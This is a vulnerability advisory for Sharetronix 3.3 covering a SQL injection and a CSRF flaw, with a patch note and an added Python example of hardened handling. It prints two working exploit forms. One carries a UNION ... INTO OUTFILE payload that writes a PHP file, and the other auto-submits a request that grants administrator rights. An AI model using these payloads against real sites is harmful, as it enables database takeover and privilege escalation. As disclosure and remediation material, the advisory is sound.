Advisory ID: HTB23214
Product: Sharetronix
Vendor: Blogtronix, LLC
Vulnerable Version(s): 3.3 and probably prior
Tested Version: 3.3
Advisory Publication: May 7, 2014 [without technical details]
Vendor Notification: May 7, 2014
Vendor Patch: May 27, 2014
Public Disclosure: May 28, 2014
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2014-3414, CVE-2014-3415
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Sharetronix, which can be exploited to perform SQL injection and Cross-Site Request Forgery (CSRF) attacks against the vulnerable application. A remote hacker can gain full control over the application.
1) SQL Injection in Sharetronix: CVE-2014-3415
Input passed via the "invite_users[]" HTTP POST parameter to the "/[group_name]/invite" URI is not properly sanitised before being used in an SQL query. A remote attacker can send a specially crafted HTTP POST request and execute arbitrary SQL commands in the application's database.
The following exploit code creates a file "file.php" within the home directory of the MySQL server containing the output of the "phpinfo()" PHP function:
<form action="http://[host]/[group_name]/invite" method="post" name="main">
<input type="hidden" name="invite_users[]" value='0" UNION SELECT "<? phpinfo(); ?>",2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 INTO OUTFILE "file.php" -- '>
<input type="submit" id="btn">
</form>
The attacker must be registered and logged in (registration is open by default). The attacker must also first create a group (an action allowed by default); in our example the group name is "group_name".
2) Cross-Site Request Forgery (CSRF) in Sharetronix: CVE-2014-3414
The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can trick a logged-in administrator into opening a web page with a CSRF exploit and grant administrative privileges to an arbitrary existing user of the vulnerable application. Registration is open by default.
The following CSRF exploit grants administrative privileges to the user "username":
<form action="http://[host]/admin/administrators" method="post" name="main">
<input type="hidden" name="admin" value="username">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
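The hardened handling both issues above call for, as an added illustration that is not Sharetronix's own code: "invite_users[]" values are allow-listed as integer user ids and bound as SQL parameters (one placeholder per id), and the "/admin/administrators" handler checks the request Origin and a per-session token before running a bound UPDATE. The table layout, SITE_ORIGIN and the sqlite3 sample data are constructed assumptions for the example.

```python
import sqlite3
from hmac import compare_digest
from urllib.parse import urlsplit

SITE_ORIGIN = "https://sharetronix.example"  # assumed deployment origin (constructed)

def parse_invite_users(values):
    """Allow-list invite_users[]: every entry must be a positive integer user id.
    Quotes, UNION, comment markers etc. never reach the SQL layer."""
    ids = []
    for v in values:
        s = str(v).strip()
        if not s.isdigit() or int(s) == 0:
            raise ValueError(f"rejected invite_users[] value {s!r}")
        ids.append(int(s))
    return ids

def lookup_invitees(conn, values):
    """Parameterised IN (...) query: one '?' per id, values bound by the driver."""
    ids = parse_invite_users(values)
    sql = "SELECT id, username FROM users WHERE id IN (%s) ORDER BY id" % ",".join("?" * len(ids))
    return conn.execute(sql, ids).fetchall()

def csrf_request_allowed(headers, form_token, session_token):
    """Reject cross-origin POSTs: Origin (or Referer) must match the site's scheme
    and host exactly, and the token submitted with the form must match the session."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    if urlsplit(src)[:2] != urlsplit(SITE_ORIGIN)[:2]:
        return False
    return bool(session_token) and compare_digest(form_token or "", session_token)

def grant_admin(conn, headers, form_token, session_token, username):
    """Hardened /admin/administrators handler: CSRF check first, then a bound UPDATE."""
    if not csrf_request_allowed(headers, form_token, session_token):
        return False
    cur = conn.execute("UPDATE users SET is_admin = 1 WHERE username = ?", (username,))
    return cur.rowcount == 1

def demo_db():
    """Constructed in-memory sample of a users table for trying the functions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, is_admin INTEGER DEFAULT 0)")
    conn.executemany("INSERT INTO users (id, username) VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn
```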
-----------------------------------------------------------------------------------------------------
Solution:
Update to Sharetronix 3.4
More Information:
http://developer.sharetronix.com/download
-----------------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23214 - https://www.htbridge.com/advisory/HTB23214 - Multiple vulnerabilities in Sharetronix.
[2] Sharetronix - http://sharetronix.com/ - Sharetronix is a Secure Social Network for Your Company.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.